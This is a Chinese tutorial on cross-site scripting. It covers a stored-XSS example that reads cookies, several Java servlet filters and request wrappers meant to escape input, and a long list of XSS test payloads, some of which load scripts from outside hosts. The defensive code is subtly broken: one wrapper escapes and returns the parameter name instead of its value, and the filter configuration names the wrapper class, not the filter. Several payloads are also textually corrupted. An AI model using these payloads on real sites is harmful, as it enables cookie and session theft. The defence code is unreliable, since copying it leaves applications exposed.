跨站脚本攻击

跨站脚本攻击(Cross Site Scripting)，为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆，故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script(php,js等)代码，当用户浏览该页之时，嵌入其中Web里面的Script代码会被执行，从而达到恶意攻击用户的特殊目的。

攻击实例

下面为一个Input标签：

<input type="text" value="value"></input>
当用输入值为" οnfοcus="alert(document.cookie)  时，
input标签内容变为 <input type="text" value=""onfocus="alert(document.cookie)"></input>

当input中的可以执行的js脚本被存储到数据库中。用户再次取出显示时。就会取到用户的cookie。从而得到用户名和密码。
（1）添加用户

（2）数据库中存储可执行脚本

（3）编辑用户（XSS攻击发生）

攻击危害

以上获取用户名和密码只是个简单的xss攻击，还有跟多的XSS攻击实例。例如将用户导航到其他网站，后台挂马操作等

攻击预防

原理：主要采用过滤器对请求中的特殊字符进行编码转化。从而将可以执行的script代码变为不可以执行的script脚本存储到数据库中。一般的java后端采用filter种重写requestwrapper的形式来实现xss的过滤和替换

1、使用spring的HtmlUtils,可以使用StringEscapeUtils 中的过滤方法

/*** 解决XSS跨站脚本攻击和sql注入攻击,使用spring的HtmlUtils,可以使用StringEscapeUtils 中的过滤方法*/
public class XssSpringHttpServletRequestWrapper extends HttpServletRequestWrapper{public XssSpringHttpServletRequestWrapper(HttpServletRequest request) {super(request);}/*** 对数组参数进行特殊字符过滤*/@Overridepublic String[] getParameterValues(String name) {String[] values = super.getParameterValues(name);String[] newValues = new String[values.length];for (int i = 0; i < values.length; i++) {//spring的HtmlUtils进行转义newValues[i] = HtmlUtils.htmlEscape(values[i]);}return newValues;}/*** 拦截参数,并对其进行字符转义*/@Overridepublic String getParameter(String name) {return HtmlUtils.htmlEscape(name);}/*** 拦截参数,并对其进行字符转义*/@Overridepublic Object getAttribute(String name) {return HtmlUtils.htmlEscape(name);}
}

2、实现XSS过滤器

/*** spring方式xss过滤器*/
public class XssSpringFilter implements Filter{@Overridepublic void init(FilterConfig filterConfig) throws ServletException {}@Overridepublic void doFilter(ServletRequest request, ServletResponse response, FilterChain chain)throws IOException, ServletException {HttpServletRequest req = (HttpServletRequest) request;chain.doFilter(new XssSpringHttpServletRequestWrapper(req), response);}@Overridepublic void destroy() {}}

3、配置XSS过滤器

<!-- spring方式的xss过滤器 -->
<filter><filter-name>xssSpringFilter</filter-name><filter-class>cn.aric.xss.XssSpringHttpServletRequestWrapper</filter-class>
</filter>
<filter-mapping><filter-name>xssSpringFilter</filter-name><url-pattern>/*</url-pattern>
</filter-mapping>

也可以自己实现一个xss的替换和过滤规则，注意如果要读取body参数的话，要注意流只能被读一次，因为read的指针已经移动到了文件末尾，会出现body找不到的情况这个时候你需要读取了inputStream之后，再将数据写回去

package com.yl.filter;import java.io.BufferedReader;
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.InputStreamReader;
import java.nio.charset.Charset;import javax.servlet.ServletInputStream;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletRequestWrapper;import org.springframework.beans.factory.parsing.ReaderEventListener;public class XssHttpServletRequestWrapper extends HttpServletRequestWrapper {boolean isUpData = false;//判断是否是上传 上传忽略public XssHttpServletRequestWrapper(HttpServletRequest servletRequest) {super(servletRequest);String contentType = servletRequest.getContentType ();if (null != contentType)isUpData =contentType.startsWith ("multipart");}@Overridepublic String[] getParameterValues(String parameter) {String[] values = super.getParameterValues(parameter);if (values==null)  {return null;}int count = values.length;String[] encodedValues = new String[count];for (int i = 0; i < count; i++) {encodedValues[i] = cleanXSS(values[i]);}return encodedValues;}@Overridepublic String getParameter(String parameter) {String value = super.getParameter(parameter);if (value == null) {return null;}return cleanXSS(value);}/*** 获取request的属性时，做xss过滤*/@Overridepublic Object getAttribute(String name) {Object value = super.getAttribute(name);if (null != value && value instanceof String) {value = cleanXSS((String) value);}return value;}@Overridepublic String getHeader(String name) {String value = super.getHeader(name);if (value == null)return null;return cleanXSS(value);}private  static  String cleanXSS(String value) {value = value.replaceAll("<", "&lt;").replaceAll(">", "&gt;");value = value.replaceAll("%3C", "&lt;").replaceAll("%3E", "&gt;");value = value.replaceAll("\\(", "&#40;").replaceAll("\\)", "&#41;");value = value.replaceAll("%28", "&#40;").replaceAll("%29", "&#41;");value = value.replaceAll("'", "&#39;");value = value.replaceAll("eval\\((.*)\\)", "");value = value.replaceAll("[\\\"\\\'][\\s]*javascript:(.*)[\\\"\\\']", "\"\"");value = value.replaceAll("script", "");return value;}@Overridepublic ServletInputStream getInputStream () throws IOException {if (isUpData){return super.getInputStream ();}else{final ByteArrayInputStream bais = new ByteArrayInputStream(inputHandlers(super.getInputStream ()).getBytes ());return new ServletInputStream() {@Overridepublic int read() throws IOException {return bais.read();}public boolean isFinished() {return false;}public boolean isReady() {return false;}public void setReadListener(ReaderEventListener readListener) { }};}}public   String inputHandlers(ServletInputStream servletInputStream){StringBuilder sb = new StringBuilder();BufferedReader reader = null;try {reader = new BufferedReader(new InputStreamReader (servletInputStream, Charset.forName("UTF-8")));String line = "";while ((line = reader.readLine()) != null) {sb.append(line);}} catch (IOException e) {e.printStackTrace();} finally {if (servletInputStream != null) {try {servletInputStream.close();} catch (IOException e) {e.printStackTrace();}}if (reader != null) {try {reader.close();} catch (IOException e) {e.printStackTrace();}}}return  cleanXSS(sb.toString ());}
}

再贴一个xss的实现，使用正则匹配方式来实现过滤，但是这样也有可能出现正则漏洞攻击，但是安全这东西本身就是相对而言的。


import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletRequestWrapper;
import java.util.regex.Pattern;public class XSSRequestWrapper extends HttpServletRequestWrapper {public XSSRequestWrapper(HttpServletRequest request) {super(request);}@Overridepublic String[] getParameterValues(String parameter) {String[] values = super.getParameterValues(parameter);if (values == null) {return null;}int count = values.length;String[] encodedValues = new String[count];for (int i = 0; i < count; i++) {encodedValues[i] = stripXSS(values[i]);}return encodedValues;}@Overridepublic String getParameter(String parameter) {String value = super.getParameter(parameter);return stripXSS(value);}@Overridepublic String getHeader(String name) {String value = super.getHeader(name);//return stripXSS(value);return value;}public String getQueryString() {String value = super.getQueryString();if (value != null) {value = stripXSS(value);}return value;}private String stripXSS(String value) {if (value != null) {// Avoid anything between script tagsPattern scriptPattern = Pattern.compile("<script>(.*?)</script>", Pattern.CASE_INSENSITIVE);value = scriptPattern.matcher(value).replaceAll("");// Avoid anything in a// expressionscriptPattern = Pattern.compile("src[\r\n]*=[\r\n]*\\\'(.*?)\\\'",Pattern.CASE_INSENSITIVE | Pattern.MULTILINE | Pattern.DOTALL);value = scriptPattern.matcher(value).replaceAll("");scriptPattern = Pattern.compile("src[\r\n]*=[\r\n]*\\\"(.*?)\\\"",Pattern.CASE_INSENSITIVE | Pattern.MULTILINE | Pattern.DOTALL);value = scriptPattern.matcher(value).replaceAll("");// Remove any lonesome </script> tagscriptPattern = Pattern.compile("</script>", Pattern.CASE_INSENSITIVE);value = scriptPattern.matcher(value).replaceAll("");// Remove any lonesome <script ...> tagscriptPattern = Pattern.compile("<script(.*?)>",Pattern.CASE_INSENSITIVE | Pattern.MULTILINE | Pattern.DOTALL);value = scriptPattern.matcher(value).replaceAll("");// Avoid eval(...) expressionsscriptPattern = Pattern.compile("eval\\((.*?)\\)",Pattern.CASE_INSENSITIVE | Pattern.MULTILINE | Pattern.DOTALL);value = scriptPattern.matcher(value).replaceAll("");// Avoid expression(...) expressionsscriptPattern = Pattern.compile("expression\\((.*?)\\)",Pattern.CASE_INSENSITIVE | Pattern.MULTILINE | Pattern.DOTALL);value = scriptPattern.matcher(value).replaceAll("");// Avoid javascript:... expressionsscriptPattern = Pattern.compile("javascript:", Pattern.CASE_INSENSITIVE);value = scriptPattern.matcher(value).replaceAll("");// Avoid vbscript:... expressionsscriptPattern = Pattern.compile("vbscript:", Pattern.CASE_INSENSITIVE);value = scriptPattern.matcher(value).replaceAll("");// Avoid οnlοad= expressionsscriptPattern = Pattern.compile("onload(.*?)=",Pattern.CASE_INSENSITIVE | Pattern.MULTILINE | Pattern.DOTALL);value = scriptPattern.matcher(value).replaceAll("");/*过滤html标签*/Pattern p_html = Pattern.compile("<[^>]+>", Pattern.CASE_INSENSITIVE);value = p_html.matcher(value).replaceAll("");Pattern p_html1 = Pattern.compile("<[^>]+", Pattern.CASE_INSENSITIVE);value = p_html1.matcher(value).replaceAll("");}return value;}
}

都写好了之后，记得编写Filter配置类

@Configuration
public class ServletConfig {@Beanpublic FilterRegistrationBean heFilterRegistration() {FilterRegistrationBean registration = new FilterRegistrationBean(new xssFilter());registration.addUrlPatterns("/*");return registration;}
}

XSS测试语句

部分测试：

<script>alert('hello，gaga!');</script> //经典语句，哈哈！>"'><img src="javascript.:alert('XSS')">>"'><script>alert('XSS')</script><table background='javascript.:alert(([code])'></table><object type=text/html data='javascript.:alert(([code]);'></object>"+alert('XSS')+"'><script>alert(document.cookie)</script>='><script>alert(document.cookie)</script><script>alert(document.cookie)</script><script>alert(vulnerable)</script><s&#99;ript>alert('XSS')</script><img src="javas&#99;ript:alert('XSS')">%0a%0a<script>alert(\"Vulnerable\")</script>.jsp%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html<script>alert('Vulnerable')</script>a.jsp/<script>alert('Vulnerable')</script>"><script>alert('Vulnerable')</script><IMG SRC="javascript.:alert('XSS');"><IMG src="/javascript.:alert"('XSS')><IMG src="/JaVaScRiPt.:alert"('XSS')><IMG src="/JaVaScRiPt.:alert"(&quot;XSS&quot;)><IMG SRC="jav&#x09;ascript.:alert('XSS');"><IMG SRC="jav&#x0A;ascript.:alert('XSS');"><IMG SRC="jav&#x0D;ascript.:alert('XSS');">"<IMG src="/java"\0script.:alert(\"XSS\")>";'>out<IMG SRC=" javascript.:alert('XSS');"><SCRIPT>a=/XSS/alert(a.source)</SCRIPT><BODY BACKGROUND="javascript.:alert('XSS')"><BODY ONLOAD=alert('XSS')><IMG DYNSRC="javascript.:alert('XSS')"><IMG LOWSRC="javascript.:alert('XSS')"><BGSOUND SRC="javascript.:alert('XSS');"><br size="&{alert('XSS')}"><LAYER SRC="http://xss.ha.ckers.org/a.js"></layer><LINK REL="stylesheet"HREF="javascript.:alert('XSS');"><IMG SRC='vbscript.:msgbox("XSS")'><META. HTTP-EQUIV="refresh"CONTENT="0;url=javascript.:alert('XSS');"><IFRAME. src="/javascript.:alert"('XSS')></IFRAME><FRAMESET><FRAME. src="/javascript.:alert"('XSS')></FRAME></FRAMESET><TABLE BACKGROUND="javascript.:alert('XSS')"><DIV STYLE="background-image: url(javascript.:alert('XSS'))"><DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html&#39;);"><DIV STYLE="width: expression(alert('XSS'));"><STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE><IMG STYLE='xss:expre\ssion(alert("XSS"))'><STYLE. TYPE="text/javascript">alert('XSS');</STYLE><STYLE. TYPE="text/css">.XSS{background-image:url("javascript.:alert('XSS')");}</STYLE><A CLASS=XSS></A><STYLE. type="text/css">BODY{background:url("javascript.:alert('XSS')")}</STYLE><BASE HREF="javascript.:alert('XSS');//">getURL("javascript.:alert('XSS')")a="get";b="URL";c="javascript.:";d="alert('XSS');";eval(a+b+c+d);<XML SRC="javascript.:alert('XSS');">"> <BODY NLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"<SCRIPT. SRC="http://xss.ha.ckers.org/xss.jpg"></SCRIPT><IMG SRC="javascript.:alert('XSS')"<SCRIPT. a=">"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT><SCRIPT.=">"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT><SCRIPT. a=">"''SRC="http://xss.ha.ckers.org/a.js"></SCRIPT><SCRIPT."a='>'"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT><SCRIPT>document.write("<SCRI");</SCRIPT>PTSRC="http://xss.ha.ckers.org/a.js"></SCRIPT><A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A>

【安全系列之XSS】XSS攻击测试以及防御相关推荐

XSS跨站脚本攻击原理与常见的脚本及《XSS跨站脚本攻击剖析与防御》摘录总结
XSS跨站脚本攻击原理与常见的脚本及<XSS跨站脚本攻击剖析与防御>摘录总结一.XSS跨站脚本攻击的原理 1.什么是XSS跨站脚本 2.跨站脚本攻击产生因素二.XSS跨站脚本攻击的类别 ...
《XSS跨站脚本攻击剖析与防御》—第6章6.1节参考文献
本节书摘来自异步社区<XSS跨站脚本攻击剖析与防御>一书中的第6章6.1节参考文献,作者邱永华,更多章节内容可以访问云栖社区"异步社区"公众号查看. 参考文 ...
XSS跨站脚本攻击剖析与防御笔记
读书笔记,希望某位小伙伴用得上第一章XSS初探 1.概念:Cross-Site Scripting简称XSS,是由于WEB应用程序对用户的输入过滤不足而产生的,攻击者利用网站漏洞把恶意脚本注入到网站 ...
XSS(跨站脚本攻击)相关内容总结整理
XSS的攻击相关资料整理文章目录 XSS的攻击相关资料整理跨站脚本攻击(XSS) XSS 简介 XSS 危害 XSS 原理 XSS 分类 XSS 防御总结 XSS 问答参考资料跨站脚本攻击(X ...
遭遇 XSS 跨站脚本攻击？稳住，这些方法可保你渡劫 | 附代码、图解
作者 | 杨秀璋责编 | 夕颜出品 | CSDN博客本文将详细讲解XSS跨站脚本攻击,从原理.示例.危害到三种常见类型(反射型.存储型.DOM型),并结合代码示例进行详细讲解,最后分享了如何预防 ...
防止XSS跨站脚本攻击：Java过滤器
XSS问题描述跨站脚本(Cross site script,简称xss)是一种"HTML注入",由于攻击的脚本多数时候是跨域的,所以称之为"跨域脚本". 我们 ...
渗透知识-XSS跨站脚本攻击
XSS跨站脚本攻击:两种情况.一种通过外部输入然后直接在浏览器端触发,即反射型XSS:还有一种则是先把利用代码保存在数据库或文件中,当web程序读取利用代码并输出在页面上时触发漏洞,即存储型XSS.D ...
php的服务器变量$SERVER以及防止$_SERVER['PHP_SELF']造成的XSS漏洞攻击及其解决方案
一.背景突然想起来之前面试的一些面试题,让我写出几个服务器变量$SERVER代表的意思..实话实说,这些东西已经忘记很久了,都是用的时候直接上网查,今天再复习复习吧. 二.$SERVER $_SER ...
XSS (跨站脚本攻击) 分析与实战
文章目录一.漏洞原理 1.XSS简介: 2.XSS原理解析: 3.XSS的分类: 3.1.反射型XSS 3.2.存储型XSS 3.3.DOM型XSS 二.靶场实战 XSS实现盗取管理员Cookie并 ...

【安全系列之XSS】XSS攻击测试以及防御